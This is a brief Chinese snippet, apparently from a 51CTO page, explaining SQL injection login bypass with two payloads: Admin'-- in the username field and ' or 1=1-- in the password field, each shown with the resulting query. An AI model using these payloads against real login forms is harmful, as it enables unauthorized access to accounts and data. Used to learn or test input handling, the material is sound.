1,在登陆界面中知道用户名时(比如Admin),在用户名处输入Admin'-- // SELECT * FROM User WHERE UserName='Admin'-- 此时,密码被无效 2,不知道用户名时,在密码处输入 ' or 1=1-- //SELECT * FROM User WHERE UserName='' or 1=1-- &
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号